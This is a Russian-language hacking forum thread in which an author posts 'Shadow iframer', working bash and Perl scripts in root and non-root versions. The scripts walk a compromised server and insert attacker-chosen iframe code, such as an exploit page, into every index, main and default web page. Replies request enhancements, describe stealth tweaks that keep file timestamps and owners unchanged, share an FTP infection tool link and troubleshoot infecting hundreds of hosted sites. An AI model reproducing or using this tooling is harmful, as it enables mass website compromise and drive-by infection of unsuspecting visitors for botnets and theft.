Shadow iframer [local] | [local][n0b0dy] version
 

Shadow iframer[local] [r00t] & [n0b0dy] versions

[ I Что? ]
Shadow iframer (нормального названия не смог придумать =\) - небольшой ифреймер, написанный мной сегодня ночью :D
Как известно, ифреймер - небольшая программа (а какие лоси пытались продать нечто подобное за 25$ :D) для вставки своего кода в php/html файлы. Смысл в этом такой:
Например, вам слили очередной превад сплойт из превада ачата. Сплойтенг берет все ослы, до седьмого включительно. Ясное дело, что его необходимо заюзать и поиметь энное кол-во ботов\асек\3.14зженный вебмань :D
А у вас под рукой как раз есть небольшой хостинг, который вы недавно порутали. на нем есть несколько К хтмл страниц, вставлять код в каждую ручками очень накладно. Этим и занимаюсться ифреймеры. Они автоматически вставляют некоторый код в html\php паги. Обычно это делается удаленно (например по фтп) или локально.
Эта версия - локальная.

[ II Как? ]
Для начала расскажу немного об устройстве этого скрипта.
Скрипт написан на баше с перловыми вставками. Т.к. подразумевается что трояниться будут все страницы, то скрипт соответственно требует рута. Конечно, переписать его под нобади\нерута и конкретную диру можно (но нужно ли?)).
По размеру скрипт достаточно маленький :)

Использовать его очень просто. Нужно только запустить с один параметром - файлом с ифрейм кодом (естественно, код может быть любым)). Далее скрипт найдет все index файлы и вставит в них ваш код. Добавление идет в начало body скрипта.
Вот лог запуска:

Код:

---

# ./iframe.sh
[*]Searching for perl.../usr/bin/perl
[*]Starting index finder...please wait...search complete. Found X pages
[*]Generating iframer...complete.Starting iframer
[*] Injecting complete, deleting temp files...
[*] Finished

---

[ III Sources&outro ]

Собственно сорец:
[r00t] version

Код:

---

#!/bin/bash

if [ $UID != 0 ]; then
  echo "[x]Need r00t :("; exit 1;
fi

check=`expr length "$1"`

if [ $check == 0 ]; then
  echo "########################################"
  echo "#Shadow iframer[local]  (c)ode by Gh0s7#"
  echo "########################################"
  echo "#usage: ./sh-iframe.sh [iframe file]  #"
  echo "#      ./sh-iframe.sh exploit.html    #"
  echo "########################################"
  exit 1
fi

echo -n "[*]Searching for perl..."; which perl

if [ $? != 0 ]; then
  echo "[x]No perl?"; exit
fi

echo -n "[*]Starting index finder...please wait..."

find / -name "index.html*" 2> /dev/null > /tmp/found
find / -name "index.php*"  2> /dev/null >> /tmp/found
find / -name "index.shtml" 2> /dev/null >> /tmp/found
find / -name "index.phtml" 2> /dev/null >> /tmp/found
find / -name "main.html*" 2> /dev/null > /tmp/found
find / -name "main.php*"  2> /dev/null >> /tmp/found
find / -name "default.php*"  2> /dev/null >> /tmp/found
find / -name "main.shtml" 2> /dev/null >> /tmp/found

len=`cat /tmp/found| wc -l`

echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."

iframer='\n
while (<INPUT>) {
  chomp; $file = $_;
  @res = split (/\//);
  $len = 0;
  foreach (@res) { $len++; }
  open (FILE, "<$_") or die;
  open (TMP, ">/tmp/$res[$len-1]") or die;
  open (INJECT, "<$inject") or die;
  sysread (INJECT, $code, 1024);
  close (INJECT);
  while (<FILE>) {
    print TMP $_;
    if (/<body>/) { print TMP $code; }
  }
  close (TMP);
  close (FILE);
  system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
  system ("./mv $file /tmp/$res[$len-1].bak");
  system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl

echo 'mv $@' > ./mv; chmod +x ./mv
echo 'rm $@' > ./rm; chmod +x ./rm

echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm mv rm
rm /tmp/index*
echo "[*] Finished"
exit 0

---

[n0b0dy] version

Код:

---

#!/bin/bash

usage () {
  echo "########################################################"
  echo "#Shadow iframer[local][n0b0dy version]  (c)ode by Gh0s7#"
  echo "########################################################"
  echo "#usage: ./sh-iframe.sh [iframe file] [path]            #"
  echo "#      ./sh-iframe.sh exploit.html /var/www/31337.su  #"
  echo "########################################################"
  exit 1
}

check=`expr length "$1"`
if [ $check == 0 ]; then
  usage
fi

check=`expr length "$2"`
if [ $check == 0 ]; then
  usage
fi

if [ ! -d $2 ]; then
  echo "[x] $2 directory doesnt exists"; exit 1
fi

echo -n "[*]Searching for perl..."; which perl

if [ $? != 0 ]; then
  echo "[x]No perl?"; exit
fi

echo -n "[*]Starting index finder...please wait..."

find $2 -name "index.html*" 2> /dev/null > /tmp/found
find $2 -name "index.php*"  2> /dev/null >> /tmp/found
find $2 -name "index.shtml" 2> /dev/null >> /tmp/found
find $2 -name "index.phtml" 2> /dev/null >> /tmp/found
find $2 -name "main.html*" 2> /dev/null > /tmp/found
find $2 -name "main.php*"  2> /dev/null >> /tmp/found
find $2 -name "default.php*"  2> /dev/null >> /tmp/found
find $2 -name "main.shtml" 2> /dev/null >> /tmp/found

len=`cat /tmp/found| wc -l`

echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."

iframer='\n
while (<INPUT>) {
  chomp; $file = $_;
  @res = split (/\//);
  $len = 0;
  foreach (@res) { $len++; }
  open (FILE, "<$_") or next;
  open (TMP, ">/tmp/$res[$len-1]") or next;
  open (INJECT, "<$inject") or die;
  sysread (INJECT, $code, 1024);
  close (INJECT);
  while (<FILE>) {
    print TMP $_;
    if (/<body>/) { print TMP $code; }
  }
  close (TMP);
  close (FILE);
  system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
  system ("./mv $file /tmp/$res[$len-1].bak");
  system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl

echo 'mv $@' > /tmp/mv; chmod +x /tmp/mv
echo 'rm $@' > /tmp/rm; chmod +x /tmp/rm

echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm /tmp/mv /tmp/rm
rm /tmp/index*
echo "[*] Finished"
exit 0

---

В ближайшее время будет закончен фтп ифреймер.
В заключение попрошу каментить и оценивать :) (как обычно)

P.S. Я не утверждаю что это мега-релиз, так что кричать что "мало" и т.д. не надо.
P.P.S. Читаем и отписываемся: https://forum.antichat.ru/thread30461.html

UPD 1:
Добавил версию для "кастрированных" аков.

Я буду первым )
1) Плюс тебе за старания и написание статейки...
2)Согласен, не ново, вообщих чертах ты рассказал отлично, разложил все по-полочкам, но некоторым интересны тонкости...

Будет удобнее если в скипт добавить:

Ну в принципе для основы неплохо =) но допустим у нас не рут =) у нас есть путь к папке юзера

/home/user13/www/

содержимое папки /home/ мы просматривать можем, а вот уже на /user13/ Прав не хватает (в тоже время на /www/ все очень даже есть) .. ? ничего он не зафрэймит..

сталкивался много раз ) .. но твой явно основан на имении рута на тачке

Да, неплохо бы сделать чтоб можно было указывать с какой папки начинать искать файлы index.php и т.д
Хотя если Gh0s7 не возьмется, то могу я доделать... :p

Прочитав понятно что Нужны права РУТА!

Добавлено :)

Да, это даже написано, что ему нужен рут :)

В ближайшее время доработаю :)

blackybr, я эту фигню не догонял.Однажды поспорил с Dim-ok (ГГ привет те).Потом понял, что ошибся.Кстати респект ему ;)
Gh0s7 те конечто же тоже.Совет: читай названия дир с /etc/passwd :)

+ httpd.conf

Замечательный релиз. Ждём версию для кастрированных учёток =)

Гг, тогда напишу его после куррент проекта (модуль для проверки на веб баги)

Статья интересная, + это однозначно! ! ! но есть одно но. Все происходит под правами root их не каждый может имееть!

я бы убрал эту фразу, так как сравнивать то, что продается за 25 баксов и это, это жопу с пальцем сравнивать. А если у тебя не хостинг, а Н фтп, ты на каждый заливать будешь и запускать? То, что делает скрипт можно и руками сделать. Хостинги ломаные бывают не так часто, как бывают просто фтп etc.
P.S. Не воспринимай как оскарбление. ;) Все равно + за старание. ;)

Как оскАрбление не воспринял :)
А "если у меня не хостинг, а Н фтп", то для этого пишется отдельный фтп ифреймер, ака remote.
А то что продается за 25 по сути имеет тот же функционал.
Всеравно любой ифреймер - максимум 200 строк кода с каментами и рюшечками. "То, что делает скрипт можно и руками сделать", пожалуйста, тебе никто не запрещает пару к файлов вимом руками править)

Уважаемые форумчане, боюсь показаться дебилом, но никогда не имел дело с подобными штуками.
Я установил active perl, сохранил файл как .pl, а когда запускаю, на секунду появляется консоль и сразу пропадает.
Не имею представления что нужно сделать, а скрипт ой как нужен. Помогите пожалуйста.
Спасибо.

Пуск - выполнить - cmd - perl <как_ты_назвал_файл.pl>

А зачем тебе на локальной машине ифреймер?)

Ну вот есть рутовый доступ к нескольким серверам через whm. Как же мне использовать скрипт что б разом прописать ифреймы на несколько тысяч сайтов?

Заливай скрипт (как ты будешь это делать с цпанелем - хз), врубай его с указанием файлика с твоим кодом и все.

ага, а где ж мой код прописать?

Да куда хочешь пиши...код свой))

Вот..:)
 

Xорошый код, ифреймится, но я сделал пару фишек, которые мне казались нужными, чтобы получше фреймилось:
[+] body тэг теперь наxодится, если в нём прописаны какие то данные - например цвет
[+] не изменяется дата открытия/изменений файла
[+] не изменяется владелец модифицырованного файла
[+] пара мелкиx изменений по моему вкусу :)

Собственно сам код:
Пока в нём не xватает только, чтобы проверял на присутствие другиx фреймов, удаления или иx замены своим кодом, но это как то в будущем.

Имея на машине рута, можно найти куда более интересные применения для нее => вижу смысл юзания только ftp iframer'a

FTP-iframer:
[Возможности]
1/ Автоматическая проверка всех аккаунтов перед добавлением
2/ Гибкая возможность управления добавляемого кода
3/ Подробный лог добавляемого кода позволяющий эффективней работать скрипту
4/ Экспорт лога в удобном виде
5/ Импорт и экспорт ftp аккаунтов согласно определенных форматов
6/ ftp аккаунты возможно контроллировать визуально - добавлять / удалять лишь по одному
7/ пароллирование скрипта
8/ возможность заливать или удалять файлы на все сервера
new
9/ интеллектуальная система позволяющас заражать только то что рационально, тем самым не тратя лишние ресурсы вашего сервера и ваше же время. заражаются только те файлы которые чаще всего будут показаны(подробнее читать в Как работает скрипт, ниже)
10/ красивая, подробная выдача, можно наблюдать за процессом инфицирования


_http://slil.ru/23882712

сливаем пока линк работает ;)

у меня в логе скрипта появляется следующее

не подскажите что бы это значило?

Пишет, что не может соxранить этот файл, потому что кончилась дисковая квота :), только странно конечно, если такое под рутом случилось:)

еще одна проблема - на сервере с небольшим количеством сайтов (штук 40) все отлично ифреймится буквально за минут 30, даже меньше. Но когда запускаю на сервере где хоститятся скажем 400-500 сайтов, скрипт очень долго ищет индексы (бывало и на 7 часов оставлял) и никакого результата, пока сокс не слетает.
Может кто подскажет в чем проблема?

Сел, немного (пару дней) поучил язык скрипта перла, понравилось, переделал ифреймер для теx, кто для рута лучшее решение не нашёл, также для теx, кто свой сервер xотят освободить от нежелательныx фреймов. Плюсы и мунусы этого релиза:
[*] дополнительно нужно указать путь, где искать файлы для фрейма, так как использование "/" по моему не целесобразно
[+] поиск файлов производится на порядок быстрее защёт използования регулярныx выражений и функции grep
[+] удаляет все фреймы по маске <iframe + ваш код + ></iframe>, если они не совпадают с кодом записанным в файле фреймов
[+] вставляет фрейм перед кодом </body>, если в файле не нашёл тэг <body.*>
[+] старается в одном файле вставлять только один код фрейма (xотябы задумка такая :))
[+] Удобно для теx, кто вставил свои фреймы, но при этом не потеряли рута, и xотят иx сменить или удалить :)
[+/-] теоретически может работать как удалитель фреймов, если файл с предпологаемым фреймом пустой (не проверялось)
[-] вставка фреймов осуществляется медленнее из за исползования функции seek в файле
[-] тестилось только на cygwin, так что не ручаюсь, если seek на nix'аx не работает аналогично!
Кстати - если в пути файла порбелы будут, то будет выскакивать ошыбка, что файл не существует , решение неискал...

P.S. извиняюсь за русский - не родной :)
P.P.S. при copy-->paste удаляйте лишние пробелы,а также о багаx пишите тут или в личку!

кто объяснит(до делает)
 

по про бывал последний вариант, -что-то он не работает

Выложите ftp инфреймер пожалуйста.

угу просим фтп инфреймер

genom-- продавал

от генома фтп ифреймер/чекер

Скачать

подскажите как его сделать автоматом через крон?

пока не убрал #!/bin/bash ругался на bad ineterpretator
bash: ./def.sh: /bin/bash^M: bad interpreter: No such file or directory

перезалейте ftp ифреймер пожалуйста

d1ez_FTP_MoneyMaker и ему подобный чем не устраивает? кому нужно в ПМ.

IIAHbI4, диезовский и подобные ему фреймеры - софт совершенно другого назначения. Как ты собираешься юзать того же диеза, если ты, скажем, порутал тачку и тебе нужно всё профреймить, пока не спалили? Только не предлагай ставить сниффер на фтп пассы или что-то подобное))

По делу - пытаюсь заюзать на тачке под рутом - unexpected end of file на 73 строке. В чем дело? 0_о

http://forum.antichat.ru/thread58971.html

Всё ещё нужен дельный совет =\

з.ы. Если кто-то знает другой локальный фреймер - тож будет интересно :)

открой и посмотри, там анти кидис стоит, синтаксис проверь, запьтую, скобку, кавычку или в readme почитай.
+ 777 на папку все диры и файлы выстави, если дедик на винде то 777 стоит по дефолту.